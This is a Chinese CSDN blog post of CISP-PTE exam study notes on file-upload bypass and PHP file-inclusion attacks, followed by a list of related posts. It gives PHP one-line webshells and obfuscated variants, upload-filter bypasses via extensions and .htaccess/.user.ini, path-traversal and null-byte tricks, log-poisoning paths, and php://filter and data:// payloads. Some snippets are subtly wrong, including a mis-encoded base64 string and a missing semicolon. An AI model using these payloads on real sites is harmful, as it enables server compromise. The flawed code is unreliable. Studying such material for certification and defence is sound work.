PTE笔记:文件上传与文件包含

于 2024-06-13 17:59:16 发布
阅读量775 收藏 15
点赞数 18
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaofengjia00/article/details/139652640
版权

目录

文件上传

文件包含

PHP相关函数

本地文件包含

远程文件包含

PHP伪协议

文件上传

1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看

2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;

3.文件有三处修改:后缀、content-type、内容(文件要真的是图片的前缀)

4.不能上传php、php3、php4、phtml等(通过bp也不行),尝试修改配置文件

  • 修改htaccess
  • 修改user.ini

5.函数过滤

选择其他函数,替换eval(),system()、assert()函数

<?php @eval($_POST["t"])?>    # t的值为函数,如t=system(ls ../)

<?php @system($_POST["t"])?>  # t的值为命令,如 t= ls

拼接--Eval()不支持

<?php

$a='sys';

$b='tem';

$c=$a.$b;

$c($_POST["c"])  ;

?>

编码绕过--eval不支持

<?php

$a=base64_decode("c31zdGVt");  # c31zdGVt是system的base64编码后的

$a($_POST["c"]);

?>

替换函数str_replace(a,b,c) 将c中a字符串替换为b

<?php

$a=str_replace('abc','ste','syabcm')

$a($_POST["c"]);

?>

 

文件包含

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。

PHP相关函数

include

include_once

require

require_once

fopen

readfile

本地文件包含

目录跳转-->../

针对../过滤-->双写..././-->..\

针对添加指定后缀的-->使用%00

针对添加前置目录的-->多使用一次..\

本地文件包含getshell

常见的web日志路径

/var/log/apache2/access.log

/var/log/httpd/access.log

/var/log/nginx/access.log

远程文件包含

PHP伪协议

http://

ftp://

php://filter

phar://

data://

php://filter

可获取指定文件的源码,当它与文件包含函数结合时,可被当做php文件执行;

常见用法示例:

PHP://filter/read=convert.base64-encode/resource=flag.php

data://

数据流封装,以传递特定格式的数据。可以让用户控制输入流,当它与文件包含函数结合时,用户输入的data数据流可被当做php文件执行。

常见用例示例:

data://text/plain,数据流

data://text/plain ;base64,base64编码格式的数据流

例题:

xiaofj100
关注
  • 18
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pte 文件包含
weixin_51387754的博客
10-13 1061
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
PTE:推信封(한계를다)
02-13
XXX(미정)프로젝트 :clipboard: 개발환경 IntelliJ 邮差 SQL开发者 源树 的GitHub :clipboard: 테스테 없음 :clipboard: 로그 없음 :clipboard: 사용기술 백엔드 Sprint Boot ... AWS EC2배포
CISP-PTE学习总结之基础练习题(三)
千寻的博客
10-20 5626
练习题目一:SQL注入 0x01 题目要求 0x02 解答过程: 0x03 解题总结: 练习题目二:文件上传突破 0x01 题目要求: 0x02 解题过程: 0x03 解题总结: 练习题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结: 练习题目四:反序列化漏洞 0x01 题目要求: 0x02 解题过程 练习题目五:失效的访问控制 0x01 题目·要求: 0x02 解题过程: 0x03 解题总结:
PTE文件包含--dvwa,pikachu
leo788的博客
12-18 247
构造位置:http://127.0.0.1:8082/vulnerabilities/fi/?拼接一下:file:///C:\phpstudy_pro\WWW\dvwa\hackable\uploads\picshell.jpg。包含位置:http://127.0.0.1:8082/vulnerabilities/fi/?图片位置:http://127.0.0.1:8082/hackable/uploads/picshell.jpg。
文件上传文件包含和目路遍历杂谈
weixin_33895695的博客
09-14 238
一、说明 文件上传文件包含和目路遍历是《黑客防线》盛行的时代常谈的getshell手法,但到现在的安全书藉感觉就比较少提及或一笔带过。在谈的年代看不懂,在看得懂的年代又不谈了,概念感觉总是很模糊所以想探究一翻。   二、文件上传 以假设当前服务端具有上传图片功能为例。 2.1 文件上传的定义 文件上传漏洞是指利用程序提供的文件上传功能,上传当前中间件可执行的脚本文件。比如tomcat就上传jsp...
CISP-PTE 文件包含
最新发布
XiaoYeZhu_1314的博客
04-25 516
2、查看页面源代码,发现data://替换成了空,其余的都在,data://被注释了。5、进入文件管理,找到html目录,找到key,拿到值。1、尝试使用data协议,发现php被过滤掉了。3、双写datdata://a://4、将地址放入蚁剑或菜刀中连接。
CISP-PTE考前练习-文件包含
千寻的博客
10-23 4420
文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
PTE-Test-Helper:PTE密钥王练习
04-29
PTE-Test-Helper 的设计与PTE考试紧密相关,为用户提供了一个仿真环境,以便他们在实际考试前进行充分的准备。 JavaScript作为该工具的核心技术,起到了至关重要的作用。JavaScript是一种常用的前端编程语言,用于...
PTE讲课PPT
11-29
这个压缩包包含了一份名为"讲课PPT.PDF"的文件,很可能是培训课程的幻灯片,涵盖了渗透测试的核心概念和技术。 渗透测试(Penetration Testing)是网络安全领域中的一个重要环节,它模拟黑客的攻击行为来评估系统和...
Access-PTE:盲元素的可访问周期表-开源
05-27
CP-DPT(Comprehensive Periodic Table in DAISY)是将元素周期表转化为DAISY格式的产物,它不仅包含基本的元素信息,如原子序数、元素符号和名称,还可能包括更深入的科学数据,如原子量、电子配置、发现历史等。...
CISP-PTE.rar
10-28
2019年CISP-PTE考点,CISP攻防领域培训授权机构名录(2019),注册信息安全专业人员-渗透测试工程师考试及注册申请表(2018).doc
cisp-pte课堂笔记-五天培训全-202209
11-16
1.rce 2.sql注入 3.逻辑漏洞 4.文件包含 5.文件上传 6.考试综合题 7.总结
CISP-PTE练习篇(基础题目三:文件包含
wojiaoqwe的博客
01-30 3096
本文仅当作练习记录使用。
渗透测试CISP-PTE文件包含
未知2066的博客
03-01 1309
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序安全漏洞。它会导致攻击者可以通过控制文件包含的输入来执行任意的代码。文件包含漏洞通常出现在Web应用程序中,当应用程序在处理用户输入时,没有正确地检查和验证用户提供的文件路径或文件名。攻击者可以利用这个漏洞,将恶意文件包含到应用程序的执行流程中,从而执行恶意代码。
网络安全学习笔记——文件包含漏洞(PTE-WEB)
just do it
06-10 290
php允许文件间的互相引用,可以在php文件里面使用include,一般来说,引用的东西应该在同一个目录里面,所以可以使用相对路径来引用——include "2.php"开发人员为了提升效率,采用文件包含的函数,由于php语言提供的文件包含功能过于强大,所以大部分的文件包含漏洞都出现在php程序之中本地文件包含是指被包含的文件在本地,可以直接通过文件名或文件夹名+文件名来引用包含,远程文件则需使用如 include"https://baidu.com/nosery"
PTE_本地文件包含wp
CHUNJIUJUN的博客
08-13 695
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了 开始答题,页面上没有什么有用信息 查看该页面的源码,也没找到什么有用信息 我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码 发现用Hello传了一次参数,第四行进行了base64加密 进行base64解密,发现是用POST方式以z0传参 综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He
PTE_远程文件包含wp
CHUNJIUJUN的博客
08-13 550
一堆看不懂的东西,发现并没有本地文件包含的点 试试远程文件包含,发现是可以的 从远程服务器远程文件包含一个写了一句话木马的 1.txt 发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀 成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦 显示 get it 查看源码,发现key值 ...
文件上传/文件包含漏洞学习
seeicb的博客
05-20 1364
title: 文件上传/文件包含漏洞学习 date: 2016-04-25 21:52:19 categories: 安全 tags: Web安全 ** 文件上传漏洞 ** 在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。 常...
CISP-PTE文件包含实操提
10-13
好的,我明白了。那么,你的问题是什么呢? 问题:你能否解释一下什么是CISP-PTE文件,以及它的作用是什么? 回答:CISP-PTE文件是指《信息安全技术 个人信息安全规范》中的“个人信息安全技术要求测试方案”文件,其中包含了一系列的实操测试题目和测试要求,用于测试个人信息安全技术人员的实际操作能力和技术水平。这些测试题目涵盖了个人信息安全技术的各个方面,包括密码学、网络安全、应用安全等等。 CISP-PTE文件的作用是为企业和组织提供一个标准化的测试方案,用于评估个人信息安全技术人员的实际操作能力和技术水平。通过参加CISP-PTE测试并获得合格证书,个人信息安全技术人员可以证明自己具备一定的实际操作能力和技术水平,从而提高自己在职场上的竞争力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值